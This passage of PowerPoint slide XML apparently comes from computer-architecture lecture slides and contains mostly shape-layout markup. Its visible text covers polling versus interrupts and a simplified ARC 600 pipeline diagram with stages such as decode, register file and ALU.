            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>A: Case 2 might be better for polling. Depends on polling interval, event urgency, and interrupt overhead.</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81955" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="0"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Polling vs Interrupts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609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3" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838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4" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066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5" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12954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296" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524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7" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752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8" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="19812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299" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209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0" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438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1" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667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2" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895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3" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124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4" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352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5" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581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6" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="38100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07" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038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8" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267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9" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495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0" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724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1" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953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2" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181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3" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410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4" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638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5" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781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6" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58674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17" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096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8" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324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9" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553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0" name="Rectangle 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010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1" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239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2" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="74676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3" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696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4" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609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5" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838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6" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066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7" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295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8" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="15240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9" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752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0" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981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1" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209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2" name="Rectangle 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438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3" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667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4" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895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5" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124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6" name="Rectangle 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352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7" name="Rectangle 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581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8" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810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9" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038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0" name="Rectangle 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267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1" name="Rectangle 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495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2" name="Rectangle 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="47244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43" name="Rectangle 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953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4" name="Rectangle 56"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181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5" name="Rectangle 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410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6" name="Rectangle 58"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="56388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47" name="Rectangle 59"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781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8" name="Rectangle 60"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867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9" name="Rectangle 61"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096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0" name="Rectangle 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324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1" name="Rectangle 63"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553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2" name="Rectangle 64"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010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3" name="Rectangle 65"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="72390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54" name="Rectangle 66"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467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5" name="Rectangle 67"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696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6" name="Rectangle 68"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="4343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57" name="Rectangle 69"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="4343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8" name="Text Box 70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="43434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 Polling time, no event</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12359" name="Text Box 71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="4343400"/>
            <a:ext cx="304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 Polling time, event occurs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="450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17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="14478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5941" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>ARC 600 Simplified Pipeline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="882650" y="1193800"/>
            <a:ext cx="781526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endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Century Gothic" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10245" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7772400" y="1905000"/>
            <a:ext cx="152400"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46" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="1905000"/>
            <a:ext cx="149225"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47" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971550" y="2276475"/>
            <a:ext cx="557213" cy="1565275"/>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endParaRPr lang="en-GB" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>Code Mem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10248" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="2286000"/>
            <a:ext cx="685800" cy="193198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r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>Aligner</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10249" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="3581400"/>
            <a:ext cx="685800" cy="558800"/>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r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>Decode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10250" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="2667000"/>
            <a:ext cx="685800" cy="83343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1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>Source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>Field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>Extract</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10251" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="2667000"/>
            <a:ext cx="838200" cy="83343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1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>Register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>File </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>32x32</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10252" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="4267200"/>
            <a:ext cx="685800" cy="284163"/>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r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>     PC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10253" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="1905000"/>
            <a:ext cx="149225"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54" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6286500" y="2781300"/>
            <a:ext cx="10668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CCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>ALU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10255" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="29718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6" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="533400" y="4419600"/>
            <a:ext cx="2743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7" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="25146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8" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="29718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9" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="38100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0" name="Line 21"/>
          <p:cNvSpPr>
